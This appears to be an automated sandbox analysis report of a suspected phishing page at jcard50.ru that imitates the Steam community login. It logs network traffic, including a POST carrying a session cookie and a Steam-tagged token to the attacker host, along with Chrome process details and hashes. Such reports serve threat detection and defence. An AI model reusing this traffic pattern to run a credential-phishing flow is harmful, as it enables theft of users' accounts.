                2025-01-13 00:00:45 UTC162INData Raw: 6c 22 3a 22 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 22 2c 22 70 61 74 68 22 3a 22 2f 6c 6f 67 69 6e 2f 68 6f 6d 65 2f 3f 67 6f 74 6f 3d 22 2c 22 69 63 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 7d 2c 22 6c 6f 67 69 6e 22 3a 7b 7d 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 73 44 65 73 6b 74 6f 70 22 3a 74 72 75 65 2c 22 69 73 49 6e 74 65 72 6e 61 6c 22 3a 66 61 6c 73 65 7d 7d 0d 0a
                Data Ascii: l":"steamcommunity.com","path":"/login/home/?goto=","icon":"https://steamcommunity.com/favicon.ico"},"login":{},"browser":{"isDesktop":true,"isInternal":false}}
                2025-01-13 00:00:45 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.549835104.21.32.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:01:05 UTC1073OUTPOST /704a2a507555061602505d340f445046 HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                Content-Length: 0
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                sec-ch-ua-platform: "Windows"
                Accept: */*
                Origin: https://jcard50.ru
                Sec-Fetch-Site: same-origin
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
                2025-01-13 00:01:06 UTC1211INHTTP/1.1 201 Created
                Date: Mon, 13 Jan 2025 00:01:06 GMT
                Content-Type: application/json; charset=utf-8
                Content-Length: 16
                Connection: close
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Etag: W/"10-oV4hJxRVSENxc/wX8+mA4/Pe4tA"
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F507fSFJnJbE3okh6fkCbraC0vzaM9bGKmiTSLV672khctFOuftI5H8mzjKZDqNFbMptxW%2BMYs45X%2Bh%2BKrryExpuxDXlH1wMy1W7qHdKXw0FemlWqluDBSE7kTPF"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90111c1b6e831875-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1673&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1651&delivery_rate=1587819&cwnd=153&unsent_bytes=0&cid=c15ff641d64c9872&ts=335&x=0"
                2025-01-13 00:01:06 UTC16INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 7d
                Data Ascii: {"success":true}


                Click to jump to process

                Click to jump to process

                Click to jump to process

                Target ID:0
                Start time:19:00:30
                Start date:12/01/2025
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Imagebase:0x7ff715980000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:2
                Start time:19:00:33
                Start date:12/01/2025
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,14714163173296110440,10901134644017132275,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Imagebase:0x7ff715980000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:3
                Start time:19:00:38
                Start date:12/01/2025
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jcard50.ru/e"
                Imagebase:0x7ff715980000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                No disassembly